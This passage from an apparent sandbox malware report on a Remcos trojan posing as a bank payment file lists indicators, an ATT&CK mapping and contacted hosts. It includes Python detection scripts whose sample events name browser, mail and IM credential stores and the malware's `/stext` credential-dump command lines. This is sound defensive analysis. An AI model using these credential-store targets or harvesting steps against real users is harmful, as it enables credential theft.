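    (SAMPLE_EXE, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db"),
    (SAMPLE_EXE, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (SAMPLE_EXE, r"HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts"),
    (SAMPLE_EXE, r"HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts"),
    ("chrome.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("firefox.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    ("explorer.exe", r"C:\Users\user\Documents\invoice.pdf"),
]

if __name__ == "__main__":
    for image, families in find_harvesters(SAMPLE_EVENTS).items():
        print(f"{image}: {', '.join(families)}")
```

On the sample events only the submitted executable is reported, with the families browser, im and mail; chrome.exe and firefox.exe are skipped as owners of the stores they read. Raise `min_families` to tighten the check, and drop the owner exemption when hunting for stealers that run inside a hollowed browser process, since the owner check then works against you.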

            Remote Access Functionality

Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0V7E34
Source: Yara match | File source: 00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe PID: 5888, type: MEMORYSTR
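Two of the indicators in this report are cheap to hunt for in endpoint telemetry: the process tree in the HIPS / PFW section above, where the sample launches its own image three times with `/stext <file under %TEMP%>` (the command-line switch NirSoft recovery tools use to write their results to a plain-text file), and the Rmc-0V7E34 mutex in this section. The Python below is an added example, not code from the report or from Joe Sandbox, that applies both checks to Sysmon-style process-creation events and mutex names. Field names follow Sysmon Event ID 1; the PIDs, the Chrome control event and the generalised mutex pattern (Rmc- followed by six alphanumerics) are assumptions.

```python
"""Hunt for the Remcos credential-harvest chain: the payload re-executes its own
image with `/stext <%TEMP% file>` once per credential family and names its
mutex Rmc-<6 chars>.  Events use Sysmon Event ID 1 field names.
"""
import re
from collections import Counter

# The report quotes the /stext path; accept both quoted and bare forms.
STEXT_RE = re.compile(r'/stext\s+(?:"([^"]+)"|(\S+))', re.I)
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
# Assumption: generalised from the single observed mutex name, Rmc-0V7E34.
REMCOS_MUTEX_RE = re.compile(r"^Rmc-[A-Z0-9]{6}$", re.I)


def stext_target(command_line):
    """Return the path passed to /stext, or None when the switch is absent."""
    m = STEXT_RE.search(command_line)
    return (m.group(1) or m.group(2)) if m else None


def is_self_spawned_stext(event):
    """True when a process starts its own image with /stext pointing into %TEMP%."""
    if event["ParentImage"].lower() != event["Image"].lower():
        return False
    target = stext_target(event["CommandLine"])
    return target is not None and TEMP_DIR_RE.search(target) is not None


def find_harvest_chains(events, min_children=2):
    """Map parent PID -> number of self-spawned /stext children, keeping parents
    with at least `min_children` such children (the report shows three)."""
    counts = Counter(e["ParentProcessId"] for e in events if is_self_spawned_stext(e))
    return {pid: n for pid, n in counts.items() if n >= min_children}


def is_remcos_mutex(object_name):
    """Match Rmc-XXXXXX after stripping the \\Sessions\\N\\BaseNamedObjects\\ prefix."""
    return REMCOS_MUTEX_RE.match(object_name.rsplit("\\", 1)[-1]) is not None


# Constructed sample events: the three /stext command lines are the ones the
# report shows; PIDs and the Chrome renderer event are made up for the demo.
IMG = r"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 2000, "ParentProcessId": 1000, "ParentImage": IMG, "Image": IMG,
     "CommandLine": f'"{IMG}"'},
    {"ProcessId": 2001, "ParentProcessId": 2000, "ParentImage": IMG, "Image": IMG,
     "CommandLine": f'"{IMG}" /stext "C:\\Users\\user\\AppData\\Local\\Temp\\hvglntqjpwxqeafzzxxpsjflkurl"'},
    {"ProcessId": 2002, "ParentProcessId": 2000, "ParentImage": IMG, "Image": IMG,
     "CommandLine": f'"{IMG}" /stext "C:\\Users\\user\\AppData\\Local\\Temp\\sptdomaclepvggbdihsivorutbiuqfu"'},
    {"ProcessId": 2003, "ParentProcessId": 2000, "ParentImage": IMG, "Image": IMG,
     "CommandLine": f'"{IMG}" /stext "C:\\Users\\user\\AppData\\Local\\Temp\\cjzw"'},
    {"ProcessId": 3001, "ParentProcessId": 3000, "ParentImage": CHROME, "Image": CHROME,
     "CommandLine": f'"{CHROME}" --type=renderer'},  # benign self-spawn, must not fire
]

if __name__ == "__main__":
    print(find_harvest_chains(SAMPLE_EVENTS))
    print(is_remcos_mutex(r"\Sessions\1\BaseNamedObjects\Rmc-0V7E34"))
```

The self-spawn test alone is noisy (browsers and Electron apps re-launch their own image constantly), which is why the check also requires the `/stext` switch and a target under %TEMP%; the per-parent count turns the three separate launches into one alert. The mutex check is a weak indicator on its own because the name is configurable in the Remcos builder, so treat it as corroboration rather than a primary rule.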
MITRE ATT&CK Matrix (techniques prefixed with digits are the ones matched by signatures; the digits are the matrix's match badges, the remaining entries are the unmatched placeholder cells of the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 11 Native API; 2 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 112 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 2 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 112 Process Injection; HTML Smuggling
Credential Access: 1 OS Credential Dumping; 2 Credentials in Registry; 1 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 128 System Information Discovery; 131 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 2 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 112 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Antivirus, Machine Learning and Genetic Malware Detection

Initial sample
Source | Detection | Scanner | Label
Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | 37% | ReversingLabs | Win32.Trojan.InjectorX
Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | 100% | Joe Sandbox ML |

Dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsf961A.tmp\System.dll | 0% | ReversingLabs |

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
URLs: No Antivirus matches
Contacted Domains
Name | IP | Active | Malicious | Reputation
geoplugin.net | 178.237.33.50 | true | false | unknown

Contacted URLs
Name | Malicious | Reputation
http://geoplugin.net/json.gp | false | unknown

URLs from Memory and Binaries (no antivirus detection for any entry; URLs are cut off where the report truncates them)
Name | Source | Malicious | Reputation
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.js | bhvF4C4.tmp.2.dr | false | unknown
http://www.imvu.comr | Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | unknown
https://account.live.com/Resources/images/Microsoft_Logotype_White_4MYDQRab31HKDWWN-1HafA2.svg | bhvF4C4.tmp.2.dr | false | unknown
https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpg | bhvF4C4.tmp.2.dr | false | unknown
https://acctcdn.msftauth.net/oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1 | bhvF4C4.tmp.2.dr | false | unknown
https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.png | bhvF4C4.tmp.2.dr | false | unknown
https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.js | bhvF4C4.tmp.2.dr | false | unknown
https://csp.withgoogle.com/csp/ads-programmable | bhvF4C4.tmp.2.dr | false | unknown
https://aefd.nelreports.net/api/report?cat=bingaotak | bhvF4C4.tmp.2.dr | false | unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2 | bhvF4C4.tmp.2.dr | false | unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684 | bhvF4C4.tmp.2.dr | false | unknown
https://deff.nelreports.net/api/report?cat=msn | bhvF4C4.tmp.2.dr | false | unknown
https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_white_ufRYlllWOw4YyDRi | bhvF4C4.tmp.2.dr | false | unknown
https://www.google.com/chrome/ | Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.dr | false | unknown
http://cdp.thawte.com/ThawteRSACA2018.crl0L | bhvF4C4.tmp.2.dr | false | unknown
https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7 | bhvF4C4.tmp.2.dr | false | unknown
https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl | bhvF4C4.tmp.2.dr | false | unknown
https://static-ecst.licdn.com/apc/trans.gif?ae11829b3d6e895a2a3516fac536a339 | bhvF4C4.tmp.2.dr | false | unknown
https://acctcdn.msftauth.net/confirmidentity_9m6e3jBPkyZiRdJxglsYsA2.js?v=1 | bhvF4C4.tmp.2.dr | false | unknown
http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0 | bhvF4C4.tmp.2.dr | false | unknown
https://www.msn.com | bhvF4C4.tmp.2.dr | false | unknown
https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80 | bhvF4C4.tmp.2.dr | false | unknown
https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo | bhvF4C4.tmp.2.dr | false | unknown
https://btloader.com/tag?o=6208086025961472&upapi=true | bhvF4C4.tmp.2.dr | false | unknown
http://www.imvu.comata | Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980743689.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980692782.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3 | bhvF4C4.tmp.2.dr | false | unknown
https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg | bhvF4C4.tmp.2.dr | false | unknown
https://acctcdn.msftauth.net/hostfooterpackage_FOuGbot8yZGKyYkh5yNQBA2.js?v=1 | bhvF4C4.tmp.2.dr | false | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2 | bhvF4C4.tmp.2.dr | false | unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843 | bhvF4C4.tmp.2.dr | false | unknown
http://ocsp.sca1b.amazontrust.com06 | bhvF4C4.tmp.2.dr | false | unknown
http://certs.godaddy.com/repository/1301 | bhvF4C4.tmp.2.dr | false | unknown
http://i.pki.goog/r1.crt0 | bhvF4C4.tmp.2.dr | false | unknown
http://www.imvu.com | Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980743689.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980692782.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://acctcdn.msftauth.net/accountcorepackage_hSxsZy9Ymkhjr2rMMwej_g2.js?v=1 | bhvF4C4.tmp.2.dr | false | unknown
http://ocsp.rootca1.amazontrust.com0: | bhvF4C4.tmp.2.dr | false | unknown
https://certs.godaddy.com/repository/0 | bhvF4C4.tmp.2.dr | false | unknown
                                                                                          unknown
                                                                                          https://pki.goog/repository/0bhvF4C4.tmp.2.drfalse
                                                                                            unknown
                                                                                            https://www.msn.com/bhvF4C4.tmp.2.drfalse
                                                                                              unknown
                                                                                              http://i.pki.goog/wr2.crt0bhvF4C4.tmp.2.drfalse
                                                                                                unknown
                                                                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480bhvF4C4.tmp.2.drfalse
                                                                                                  unknown
                                                                                                  http://cacerts.thawte.com/ThawteRSACA2018.crt0bhvF4C4.tmp.2.drfalse
                                                                                                    unknown
                                                                                                    http://crl.godaddy.com/gdroot-g2.crl0FbhvF4C4.tmp.2.drfalse
                                                                                                      unknown
                                                                                                      http://crl.rootg2.amazontrust.com/rootg2.crl0bhvF4C4.tmp.2.drfalse
                                                                                                        unknown
                                                                                                        https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                          unknown
                                                                                                          https://account.live.com/Resources/images/favicon.icobhvF4C4.tmp.2.drfalse
                                                                                                            unknown
                                                                                                            https://www.msn.com/?ocid=iehpPayment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3001766817.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002030194.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                              unknown
                                                                                                              https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9bhvF4C4.tmp.2.drfalse
                                                                                                                unknown
                                                                                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144bhvF4C4.tmp.2.drfalse
                                                                                                                  unknown
                                                                                                                  https://aefd.nelreports.net/api/report?cat=bingrmsbhvF4C4.tmp.2.drfalse
                                                                                                                    unknown
                                                                                                                    https://www.google.com/accounts/serviceloginPayment_Volksbank_EUR36550-Bestellung -4500673541.com.exefalse
                                                                                                                      unknown
                                                                                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729bhvF4C4.tmp.2.drfalse
                                                                                                                        unknown
                                                                                                                        https://acctcdn.msftauth.net/wlivepackagefull_stPwvW3-5mShoxrbkAw2qw2.js?v=1bhvF4C4.tmp.2.drfalse
                                                                                                                          unknown
                                                                                                                          https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platbhvF4C4.tmp.2.drfalse
                                                                                                                            unknown
                                                                                                                            http://crl.pki.goog/gsr1/gsr1.crl0;bhvF4C4.tmp.2.drfalse
                                                                                                                              unknown
                                                                                                                              https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpgbhvF4C4.tmp.2.drfalse
                                                                                                                                unknown
                                                                                                                                http://crl.godaddy.com/gdig2s1-2558.crl0bhvF4C4.tmp.2.drfalse
                                                                                                                                  unknown
                                                                                                                                  http://ocsp.sectigo.com0bhvF4C4.tmp.2.drfalse
                                                                                                                                    unknown
                                                                                                                                    http://certificates.godaddy.com/repository/0bhvF4C4.tmp.2.drfalse
                                                                                                                                      unknown
                                                                                                                                      https://aefd.nelreports.net/api/report?cat=bingthbhvF4C4.tmp.2.drfalse
                                                                                                                                        unknown
                                                                                                                                        https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626bhvF4C4.tmp.2.drfalse
                                                                                                                                          unknown
                                                                                                                                          https://eb2.3lift.com/sync?Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                                                            unknown
                                                                                                                                            https://acdn.adnxs.com/dmp/async_usersync.htmlbhvF4C4.tmp.2.drfalse
                                                                                                                                              unknown
                                                                                                                                              https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhvF4C4.tmp.2.drfalse
                                                                                                                                                unknown
                                                                                                                                                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comPayment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QUZEbhvF4C4.tmp.2.drfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0bhvF4C4.tmp.2.drfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://csp.withgoogle.com/csp/report-to/adspam-signals-scsbhvF4C4.tmp.2.drfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://pki.goog/repo/certs/gts1c3.der07bhvF4C4.tmp.2.drfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhvF4C4.tmp.2.drfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.msbhvF4C4.tmp.2.drfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://c.pki.goog/r/r1.crl0bhvF4C4.tmp.2.drfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3bhvF4C4.tmp.2.drfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.msn.com/de-ch/?ocid=iehpbhvF4C4.tmp.2.drfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_HFeToeM4u6fzMQF_f_rQ5QbhvF4C4.tmp.2.drfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914bhvF4C4.tmp.2.drfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpegbhvF4C4.tmp.2.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregulabhvF4C4.tmp.2.drfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8d&FrbhvF4C4.tmp.2.drfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://account.live.com/identity/confirm?mkt=EN-US&uiflavor=win10host&client_id=1E0000480728C5&connbhvF4C4.tmp.2.drfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?8f6ec558c7d1c621e0d5881446d586b0bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://www.google.com/pagead/drt/uiPayment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008749648.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007602786.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007682293.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008046399.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://account.live.com/Resources/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svgbhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://geoplugin.net/json.gpb9Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://geoplugin.net/json.gpgramFiPayment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://acctcdn.msftauth.net/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://pki.goog/gsr1/gsr1.crt02bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        http://pki.goog/repo/certs/gts1c3.der0$bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:aubhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7cabhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=httbhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-bold.wofbhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                                      unknown
IP             Domain         Country        ASN    ASN Name                     Malicious
102.165.14.28  unknown        South Africa   61317  ASDETUKhttpwwwheficedcomGB   true
178.237.33.50  geoplugin.net  Netherlands    8455   ATOM86-ASATOM86NL            false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1520599
Start date and time: 2024-09-27 16:41:53 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 16m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@9/14@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 84%
• Number of executed functions: 158
• Number of non-executed functions: 339
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
Time       Type              Description
